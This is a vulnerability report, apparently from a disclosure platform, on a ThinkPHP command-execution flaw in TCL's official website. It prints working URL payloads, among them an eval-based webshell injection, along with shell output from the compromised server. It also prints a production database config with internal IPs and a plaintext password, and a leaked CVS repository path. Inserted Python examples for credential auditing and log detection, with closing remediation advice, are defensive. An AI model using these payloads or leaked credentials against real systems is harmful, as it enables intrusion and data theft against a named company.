Getshell caused by command execution on the TCL Official Website
1. Main Site Command Execution
This is the ThinkPHP command execution vulnerability. It has gone unpatched for a very long time; the maintainers deserve a slap on the wrist.
http://www.tcl.com/new/1735.html/abc/abc/abc/?#@phpinfo()}
http://www.tcl.com/new/1735.html/abc/abc/abc/410%7b@print(eval($_POST[c]))%7D  getshell
[Screenshot of the shell]
Intranet Information
[/var/www/html/tcl/]$ whoami
apache
[/var/www/html/tcl/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1B:21:BA:99:B0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

eth1      Link encap:Ethernet  HWaddr 00:1B:21:BA:99:B2
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

eth2      Link encap:Ethernet  HWaddr 40:F2:E9:29:38:D2
          inet addr:10.4.22.72  Bcast:10.4.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0
          TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:56145622678 (52.2 GiB)  TX bytes:489393736613 (455.7 GiB)
          Memory:91580000-915a0000
Intranet Sensitive Information Leakage
Rummaging through the web directory turns up a lot of intranet information.
1. Multiple database account passwords leaked
<?php
switch ($_SERVER["HTTP_HOST"]) {
    case "localhost:8080": { // local
        $db_host = "localhost"; $db_name = "tcl"; $db_user = 'root'; $db_pass = 'root';
        $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2;
        $html_cache = false; $temp_my_cache = false;
        break;
    }
    case "10.4.21.23": { // test
        $db_host = "10.4.21.20"; $db_name = "tcl"; $db_user = 'tcladmin'; $db_pass = '000000';
        $db_host_en = "10.4.21.20"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2;
        $html_cache = false; $temp_my_cache = false;
        break;
    }
    case "10.4.21.24": { // test 2
        $db_host = "10.4.21.20"; $db_name = "tcl"; $db_user = 'tcladmin'; $db_pass = '000000';
        $db_host_en = "10.4.21.20"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2;
        $html_cache = false; $temp_my_cache = false;
        break;
    }
    case "10.4.22.72": { // official (production)
        $db_host = "10.4.22.71"; $db_name = "tcl"; $db_user = 'tcl_admin'; $db_pass = 'zpw@8b!Gurvu';
        $db_host_en = "10.4.22.71"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2;
        $html_cache = false; $temp_my_cache = false;
        break;
    }
    case "10.4.22.73": { // official 2
        $db_host = "10.4.22.71"; $db_name = "tcl"; $db_user = 'tcl_admin'; $db_pass = 'zpw@8b!Gurvu';
        $db_host_en = "10.4.22.71"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2;
        $html_cache = false; $temp_my_cache = false;
        break;
    }
    default: { // official
        $db_host = "10.4.22.71"; $db_name = "tcl"; $db_user = 'tcl_admin'; $db_pass = 'zpw@8b!Gurvu';
        $db_host_en = "10.4.22.71"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2;
        $html_cache = false; $temp_my_cache = true;
        break;
    }
}
?>
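The audit a defender would run over a config like the one above, as an added example (not code from the report or from TCL): pull every `$db_host` / `$db_user` / `$db_pass` set out of the PHP source, flag weak passwords (common, digits only, short, or equal to the username), and flag a config file that sits under the web root, where the command execution above can read it. The PHP excerpt is constructed in the shape of the leaked file with made-up values; `WEB_ROOTS`, `COMMON_PASSWORDS` and the weakness rules are my own assumptions.

```python
import re

# Constructed PHP config excerpt in the shape of the leaked file (values are made up).
SAMPLE_CONFIG = r'''<?php
switch ($_SERVER["HTTP_HOST"]) {
    case "localhost:8080": { // local
        $db_host = "localhost"; $db_user = 'root'; $db_pass = 'root'; break;
    }
    case "10.0.0.24": { // test
        $db_host = "10.0.0.20"; $db_user = 'appadmin'; $db_pass = '000000'; break;
    }
    default: { // production
        $db_host = "10.0.0.71"; $db_user = 'app_admin'; $db_pass = 'Xq7#kL9!mP2w'; break;
    }
}
?>'''

# Matches $db_host / $db_user / $db_pass assignments with single- or double-quoted values.
ASSIGN_RE = re.compile(r"\$(db_host|db_user|db_pass)\s*=\s*(['\"])(.*?)\2\s*;")
COMMON_PASSWORDS = {"", "root", "admin", "password", "123456", "000000", "123123"}
WEB_ROOTS = ("/var/www/", "/srv/www/")   # assumed document-root prefixes


def extract_credentials(php_source):
    """Return one {host, user, password} dict per case block, in source order."""
    creds, current = [], {}
    for name, _quote, value in ASSIGN_RE.findall(php_source):
        current[name] = value
        if name == "db_pass":   # the password assignment closes one credential set
            creds.append({"host": current.get("db_host", ""),
                          "user": current.get("db_user", ""),
                          "password": value})
            current = {}
    return creds


def weak_reasons(password, user):
    """List the reasons a password counts as weak (empty list = no finding)."""
    reasons = []
    if password.lower() in COMMON_PASSWORDS:
        reasons.append("common password")
    if password.isdigit():
        reasons.append("digits only")
    if len(password) < 8:
        reasons.append("shorter than 8 characters")
    if password and password.lower() == user.lower():
        reasons.append("equals username")
    return reasons


def audit(php_source, config_path):
    """Weak-credential findings, plus one finding if the config lives under a web root."""
    findings = []
    for cred in extract_credentials(php_source):
        reasons = weak_reasons(cred["password"], cred["user"])
        if reasons:
            findings.append({"issue": "weak database password",
                             "host": cred["host"], "user": cred["user"],
                             "reasons": reasons})
    if config_path.startswith(WEB_ROOTS):
        findings.append({"issue": "credentials stored under web root",
                         "path": config_path})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG, "/var/www/html/app/config.php"):
        print(finding)
```

Running it against the constructed file reports the `root`/`root` and `000000` sets and the web-root location; the production password passes the simple rules, which is exactly why the location finding matters more than the per-password ones: a readable config under `/var/www/html` leaks even a strong password.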
2. A subdomain site leaks CVS metadata
http://multimedia.tcl.com/cn/investor/CVS/Root
http://multimedia.tcl.com/CVS/Root
http://multimedia.tcl.com/en/home/CVS/Root
Contents of the CVS/Root file:
:sspi:mars.ho@source.loko-asia.com:2401/cvsdata
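Both findings leave the same kind of trace in the web server's access log: the `{@...}` ThinkPHP tag arriving in the URL (section 1) and requests for `CVS/Root` that the server answers with 200 (this section). The scanner below is an added example, not code from the report or from TCL. The log lines are constructed in Apache combined format, the rule names are my own, and the `.svn/` and `.git/` patterns generalise beyond the CVS case the report shows.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (Apache combined format); not taken from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2013:10:00:01 +0800] "GET /new/1735.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2013:10:00:02 +0800] "GET /new/1735.html/abc/abc/abc/?%7B@phpinfo()%7D HTTP/1.1" 200 40211 "-" "curl/7.30"
10.0.0.9 - - [10/Oct/2013:10:00:03 +0800] "POST /new/1735.html/abc/abc/abc/410%7b@print(eval($_POST[c]))%7D HTTP/1.1" 200 12 "-" "curl/7.30"
10.0.0.12 - - [10/Oct/2013:10:00:04 +0800] "GET /cn/investor/CVS/Root HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.0.0.12 - - [10/Oct/2013:10:00:05 +0800] "GET /en/home/CVS/Entries HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2013:10:00:06 +0800] "GET /images/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# ThinkPHP template tag "{@...}" arriving in the URL, as in the report's payloads.
TEMPLATE_TAG_RE = re.compile(r"\{\s*@")
# Version-control metadata paths; .svn and .git go beyond the CVS case in the report.
VCS_META_RE = re.compile(r"/(CVS/(Root|Entries|Repository)|\.svn/|\.git/)", re.IGNORECASE)


def decode_url(url):
    """Percent-decode up to twice so a double-encoded '{' (%257B) is still caught."""
    for _ in range(2):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def classify(line):
    """Return a finding dict for a suspicious request, or None for a clean line."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    url = decode_url(m.group("url"))
    status = int(m.group("status"))
    rules = []
    if TEMPLATE_TAG_RE.search(url):
        rules.append("thinkphp-template-injection")
    if VCS_META_RE.search(url):
        # A 200 means the server actually handed the metadata file out.
        rules.append("vcs-metadata-exposed" if status == 200 else "vcs-metadata-probe")
    if not rules:
        return None
    return {"ip": m.group("ip"), "status": status, "url": url, "rules": rules}


def scan(log_text):
    """Findings for every line of an access log, in source order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The status split matters for triage: a `CVS/Root` request answered with 404 is a scan to note, while one answered with 200 means the file was served and the repository location (like the `:sspi:` line above) is already out.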
Solution:
1. Upgrade ThinkPHP.
2. Change the passwords. Whether or not other hackers have been here before, the passwords must be changed; black-hat hackers are no pushovers.